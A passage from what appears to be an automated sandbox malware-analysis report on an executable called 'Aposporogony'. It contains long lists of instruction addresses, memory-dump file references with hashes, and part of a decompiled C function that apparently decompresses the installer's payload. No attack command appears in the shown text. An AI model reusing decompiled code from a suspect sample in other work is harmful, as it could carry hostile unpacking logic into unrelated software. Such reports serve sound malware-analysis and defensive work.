                                                                                                                                                                                      0x00406bbc
                                                                                                                                                                                      0x00406bc2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406bc8
                                                                                                                                                                                      0x00406bc8
                                                                                                                                                                                      0x00406bcc
                                                                                                                                                                                      0x00406bcf
                                                                                                                                                                                      0x00406bd2
                                                                                                                                                                                      0x00406bd5
                                                                                                                                                                                      0x00406bd8
                                                                                                                                                                                      0x00406bd9
                                                                                                                                                                                      0x00406bdc
                                                                                                                                                                                      0x00406bde
                                                                                                                                                                                      0x00406be4
                                                                                                                                                                                      0x00406be7
                                                                                                                                                                                      0x00406bea
                                                                                                                                                                                      0x00406bed
                                                                                                                                                                                      0x00406bf0
                                                                                                                                                                                      0x00406bf3
                                                                                                                                                                                      0x00406bf6
                                                                                                                                                                                      0x00406c12
                                                                                                                                                                                      0x00406c15
                                                                                                                                                                                      0x00406c18
                                                                                                                                                                                      0x00406c1b
                                                                                                                                                                                      0x00406c22
                                                                                                                                                                                      0x00406c26
                                                                                                                                                                                      0x00406c28
                                                                                                                                                                                      0x00406c2c
                                                                                                                                                                                      0x00406bf8
                                                                                                                                                                                      0x00406bf8
                                                                                                                                                                                      0x00406bfc
                                                                                                                                                                                      0x00406c04
                                                                                                                                                                                      0x00406c09
                                                                                                                                                                                      0x00406c0b
                                                                                                                                                                                      0x00406c0d
                                                                                                                                                                                      0x00406c0d
                                                                                                                                                                                      0x00406c2f
                                                                                                                                                                                      0x00406c36
                                                                                                                                                                                      0x00406c39
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c3f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c3f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c44
                                                                                                                                                                                      0x00406c44
                                                                                                                                                                                      0x00406c48
                                                                                                                                                                                      0x00407308
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407308
                                                                                                                                                                                      0x00406c4e
                                                                                                                                                                                      0x00406c51
                                                                                                                                                                                      0x00406c54
                                                                                                                                                                                      0x00406c58
                                                                                                                                                                                      0x00406c5b
                                                                                                                                                                                      0x00406c61
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c66
                                                                                                                                                                                      0x00406c69
                                                                                                                                                                                      0x00406c69
                                                                                                                                                                                      0x00406c69
                                                                                                                                                                                      0x00406c6f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c71
                                                                                                                                                                                      0x00406c74
                                                                                                                                                                                      0x00406c77
                                                                                                                                                                                      0x00406c7a
                                                                                                                                                                                      0x00406c7d
                                                                                                                                                                                      0x00406c80
                                                                                                                                                                                      0x00406c83
                                                                                                                                                                                      0x00406c86
                                                                                                                                                                                      0x00406c89
                                                                                                                                                                                      0x00406c8c
                                                                                                                                                                                      0x00406c8f
                                                                                                                                                                                      0x00406ca7
                                                                                                                                                                                      0x00406caa
                                                                                                                                                                                      0x00406cad
                                                                                                                                                                                      0x00406cb0
                                                                                                                                                                                      0x00406cb0
                                                                                                                                                                                      0x00406cb3
                                                                                                                                                                                      0x00406cb7
                                                                                                                                                                                      0x00406cb9
                                                                                                                                                                                      0x00406c91
                                                                                                                                                                                      0x00406c91
                                                                                                                                                                                      0x00406c99
                                                                                                                                                                                      0x00406c9e
                                                                                                                                                                                      0x00406ca0
                                                                                                                                                                                      0x00406ca2
                                                                                                                                                                                      0x00406ca2
                                                                                                                                                                                      0x00406cbc
                                                                                                                                                                                      0x00406cc3
                                                                                                                                                                                      0x00406cc6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cc8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cc8
                                                                                                                                                                                      0x00406cc6
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d08
                                                                                                                                                                                      0x00406d08
                                                                                                                                                                                      0x00406d0c
                                                                                                                                                                                      0x00407314
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407314
                                                                                                                                                                                      0x00406d12
                                                                                                                                                                                      0x00406d15
                                                                                                                                                                                      0x00406d18
                                                                                                                                                                                      0x00406d1c
                                                                                                                                                                                      0x00406d1f
                                                                                                                                                                                      0x00406d25
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d2a
                                                                                                                                                                                      0x00406d2d
                                                                                                                                                                                      0x00406d2d
                                                                                                                                                                                      0x00406d33
                                                                                                                                                                                      0x00406cd1
                                                                                                                                                                                      0x00406cd1
                                                                                                                                                                                      0x00406cd4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cd4
                                                                                                                                                                                      0x00406d35
                                                                                                                                                                                      0x00406d35
                                                                                                                                                                                      0x00406d38
                                                                                                                                                                                      0x00406d3b
                                                                                                                                                                                      0x00406d3e
                                                                                                                                                                                      0x00406d41
                                                                                                                                                                                      0x00406d44
                                                                                                                                                                                      0x00406d47
                                                                                                                                                                                      0x00406d4a
                                                                                                                                                                                      0x00406d4d
                                                                                                                                                                                      0x00406d50
                                                                                                                                                                                      0x00406d53
                                                                                                                                                                                      0x00406d6b
                                                                                                                                                                                      0x00406d6e
                                                                                                                                                                                      0x00406d71
                                                                                                                                                                                      0x00406d74
                                                                                                                                                                                      0x00406d74
                                                                                                                                                                                      0x00406d77
                                                                                                                                                                                      0x00406d7b
                                                                                                                                                                                      0x00406d7d
                                                                                                                                                                                      0x00406d55
                                                                                                                                                                                      0x00406d55
                                                                                                                                                                                      0x00406d5d
                                                                                                                                                                                      0x00406d62
                                                                                                                                                                                      0x00406d64
                                                                                                                                                                                      0x00406d66
                                                                                                                                                                                      0x00406d66
                                                                                                                                                                                      0x00406d80
                                                                                                                                                                                      0x00406d87
                                                                                                                                                                                      0x00406d8a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d8c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d8c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407019
                                                                                                                                                                                      0x00407019
                                                                                                                                                                                      0x0040701d
                                                                                                                                                                                      0x00407344
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407344
                                                                                                                                                                                      0x00407023
                                                                                                                                                                                      0x00407026
                                                                                                                                                                                      0x00407029
                                                                                                                                                                                      0x0040702d
                                                                                                                                                                                      0x00407030
                                                                                                                                                                                      0x00407036
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x0040703b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406de9
                                                                                                                                                                                      0x00406de9
                                                                                                                                                                                      0x00406dec
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407128
                                                                                                                                                                                      0x0040712c
                                                                                                                                                                                      0x0040714e
                                                                                                                                                                                      0x00407151
                                                                                                                                                                                      0x0040715b
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040712e
                                                                                                                                                                                      0x00407131
                                                                                                                                                                                      0x00407135
                                                                                                                                                                                      0x00407138
                                                                                                                                                                                      0x00407138
                                                                                                                                                                                      0x0040713b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071e5
                                                                                                                                                                                      0x004071e9
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x0040720e
                                                                                                                                                                                      0x00407215
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x004071eb
                                                                                                                                                                                      0x004071ee
                                                                                                                                                                                      0x004071f1
                                                                                                                                                                                      0x004071f4
                                                                                                                                                                                      0x004071fb
                                                                                                                                                                                      0x0040713f
                                                                                                                                                                                      0x0040713f
                                                                                                                                                                                      0x00407142
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072d6
                                                                                                                                                                                      0x004072d9
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f10
                                                                                                                                                                                      0x00406f12
                                                                                                                                                                                      0x00406f19
                                                                                                                                                                                      0x00406f1a
                                                                                                                                                                                      0x00406f1c
                                                                                                                                                                                      0x00406f1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f27
                                                                                                                                                                                      0x00406f2a
                                                                                                                                                                                      0x00406f2d
                                                                                                                                                                                      0x00406f2f
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f32
                                                                                                                                                                                      0x00406f35
                                                                                                                                                                                      0x00406f3c
                                                                                                                                                                                      0x00406f3f
                                                                                                                                                                                      0x00406f4d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407226
                                                                                                                                                                                      0x0040722d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407236
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x0040723c
                                                                                                                                                                                      0x0040723f
                                                                                                                                                                                      0x00407242
                                                                                                                                                                                      0x00407246
                                                                                                                                                                                      0x00407249
                                                                                                                                                                                      0x0040724f
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407254
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x0040725e
                                                                                                                                                                                      0x004072be
                                                                                                                                                                                      0x004072c1
                                                                                                                                                                                      0x004072c6
                                                                                                                                                                                      0x004072c7
                                                                                                                                                                                      0x004072c9
                                                                                                                                                                                      0x004072cb
                                                                                                                                                                                      0x004072ce
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071e0
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00407260
                                                                                                                                                                                      0x00407266
                                                                                                                                                                                      0x00407269
                                                                                                                                                                                      0x0040726c
                                                                                                                                                                                      0x0040726f
                                                                                                                                                                                      0x00407272
                                                                                                                                                                                      0x00407275
                                                                                                                                                                                      0x00407278
                                                                                                                                                                                      0x0040727b
                                                                                                                                                                                      0x0040727e
                                                                                                                                                                                      0x00407281
                                                                                                                                                                                      0x0040729a
                                                                                                                                                                                      0x0040729d
                                                                                                                                                                                      0x004072a0
                                                                                                                                                                                      0x004072a3
                                                                                                                                                                                      0x004072a7
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072aa
                                                                                                                                                                                      0x004072ad
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x0040728b
                                                                                                                                                                                      0x00407290
                                                                                                                                                                                      0x00407292
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x004072b0
                                                                                                                                                                                      0x004072b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f55
                                                                                                                                                                                      0x00406f58
                                                                                                                                                                                      0x00406f8e
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c4
                                                                                                                                                                                      0x004070c6
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x004070cc
                                                                                                                                                                                      0x004070cf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070d5
                                                                                                                                                                                      0x004070d9
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00406f5a
                                                                                                                                                                                      0x00406f5c
                                                                                                                                                                                      0x00406f5e
                                                                                                                                                                                      0x00406f60
                                                                                                                                                                                      0x00406f63
                                                                                                                                                                                      0x00406f64
                                                                                                                                                                                      0x00406f66
                                                                                                                                                                                      0x00406f68
                                                                                                                                                                                      0x00406f6b
                                                                                                                                                                                      0x00406f6e
                                                                                                                                                                                      0x00406f84
                                                                                                                                                                                      0x00406f89
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc5
                                                                                                                                                                                      0x00406ff1
                                                                                                                                                                                      0x00406ff3
                                                                                                                                                                                      0x00406ffa
                                                                                                                                                                                      0x00406ffd
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407007
                                                                                                                                                                                      0x0040700a
                                                                                                                                                                                      0x00407011
                                                                                                                                                                                      0x00407014
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407044
                                                                                                                                                                                      0x00407047
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00407049
                                                                                                                                                                                      0x0040704f
                                                                                                                                                                                      0x00407052
                                                                                                                                                                                      0x00407055
                                                                                                                                                                                      0x00407058
                                                                                                                                                                                      0x0040705b
                                                                                                                                                                                      0x0040705e
                                                                                                                                                                                      0x00407061
                                                                                                                                                                                      0x00407064
                                                                                                                                                                                      0x00407067
                                                                                                                                                                                      0x0040706a
                                                                                                                                                                                      0x00407083
                                                                                                                                                                                      0x00407085
                                                                                                                                                                                      0x00407088
                                                                                                                                                                                      0x00407089
                                                                                                                                                                                      0x0040708c
                                                                                                                                                                                      0x0040708e
                                                                                                                                                                                      0x00407091
                                                                                                                                                                                      0x00407093
                                                                                                                                                                                      0x00407095
                                                                                                                                                                                      0x00407098
                                                                                                                                                                                      0x0040709a
                                                                                                                                                                                      0x0040709d
                                                                                                                                                                                      0x004070a1
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a4
                                                                                                                                                                                      0x004070a7
                                                                                                                                                                                      0x004070aa
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x00407074
                                                                                                                                                                                      0x00407079
                                                                                                                                                                                      0x0040707b
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x004070ad
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x00406fc7
                                                                                                                                                                                      0x00406fca
                                                                                                                                                                                      0x00406fcc
                                                                                                                                                                                      0x00406fcf
                                                                                                                                                                                      0x00406fd2
                                                                                                                                                                                      0x00406fd5
                                                                                                                                                                                      0x00406fd7
                                                                                                                                                                                      0x00406fda
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe3
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406f70
                                                                                                                                                                                      0x00406f73
                                                                                                                                                                                      0x00406f75
                                                                                                                                                                                      0x00406f78
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cdb
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00406ce1
                                                                                                                                                                                      0x00406ce4
                                                                                                                                                                                      0x00406ce7
                                                                                                                                                                                      0x00406cea
                                                                                                                                                                                      0x00406ced
                                                                                                                                                                                      0x00406cf0
                                                                                                                                                                                      0x00406cf3
                                                                                                                                                                                      0x00406cf5
                                                                                                                                                                                      0x00406cf8
                                                                                                                                                                                      0x00406cfb
                                                                                                                                                                                      0x00406cfe
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e66
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00406e6c
                                                                                                                                                                                      0x00406e6f
                                                                                                                                                                                      0x00406e72
                                                                                                                                                                                      0x00406e75
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e7a
                                                                                                                                                                                      0x00406e7d
                                                                                                                                                                                      0x00406e80
                                                                                                                                                                                      0x00406e83
                                                                                                                                                                                      0x00406e86
                                                                                                                                                                                      0x00406e89
                                                                                                                                                                                      0x00406e8a
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8f
                                                                                                                                                                                      0x00406e92
                                                                                                                                                                                      0x00406e95
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e9b
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070e9
                                                                                                                                                                                      0x004070ec
                                                                                                                                                                                      0x004070ef
                                                                                                                                                                                      0x004070f2
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f7
                                                                                                                                                                                      0x004070fa
                                                                                                                                                                                      0x004070fd
                                                                                                                                                                                      0x00407100
                                                                                                                                                                                      0x00407103
                                                                                                                                                                                      0x00407106
                                                                                                                                                                                      0x00407107
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x0040710c
                                                                                                                                                                                      0x0040710f
                                                                                                                                                                                      0x00407112
                                                                                                                                                                                      0x00407115
                                                                                                                                                                                      0x00407118
                                                                                                                                                                                      0x0040711c
                                                                                                                                                                                      0x0040711e
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00407356
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406985
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00407161
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d95

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                      • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                                                                                      • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                                                      			E00406EAF() {
                                                                                                                                                                                      				unsigned short _t531;
                                                                                                                                                                                      				signed int _t532;
                                                                                                                                                                                      				void _t533;
                                                                                                                                                                                      				signed int _t534;
                                                                                                                                                                                      				signed int _t535;
                                                                                                                                                                                      				signed int _t565;
                                                                                                                                                                                      				signed int _t568;
                                                                                                                                                                                      				signed int _t589;
                                                                                                                                                                                      				signed int* _t606;
                                                                                                                                                                                      				void* _t613;
                                                                                                                                                                                      
                                                                                                                                                                                      				L0:
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L0:
                                                                                                                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                                      						 *(_t613 - 0x84) = 0xb;
                                                                                                                                                                                      						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                                                                                                                      						goto L132;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      						L88:
                                                                                                                                                                                      						 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      						L89:
                                                                                                                                                                                      						__eax =  *(__ebp - 4);
                                                                                                                                                                                      						 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                      						__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      						L69:
                                                                                                                                                                                      						 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							L132:
                                                                                                                                                                                      							 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								L133:
                                                                                                                                                                                      								_t531 =  *_t606;
                                                                                                                                                                                      								_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                      								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                      								if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                      									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                      									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                      									 *(_t613 - 0x40) = 1;
                                                                                                                                                                                      									_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                      									 *_t606 = _t532;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                      									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      									goto L139;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								L137:
                                                                                                                                                                                      								if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      									 *(_t613 - 0x88) = 5;
                                                                                                                                                                                      									L170:
                                                                                                                                                                                      									_t568 = 0x22;
                                                                                                                                                                                      									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                                      									_t535 = 0;
                                                                                                                                                                                      									L172:
                                                                                                                                                                                      									return _t535;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                                      								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      								L139:
                                                                                                                                                                                      								_t533 =  *(_t613 - 0x84);
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                      										L1:
                                                                                                                                                                                      										_t534 =  *(_t613 - 0x88);
                                                                                                                                                                                      										if(_t534 > 0x1c) {
                                                                                                                                                                                      											break;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										switch( *((intOrPtr*)(_t534 * 4 +  &M00407395))) {
                                                                                                                                                                                      											case 0:
                                                                                                                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      												_t534 =  *( *(_t613 - 0x70));
                                                                                                                                                                                      												if(_t534 > 0xe1) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                      												_push(0x2d);
                                                                                                                                                                                      												asm("cdq");
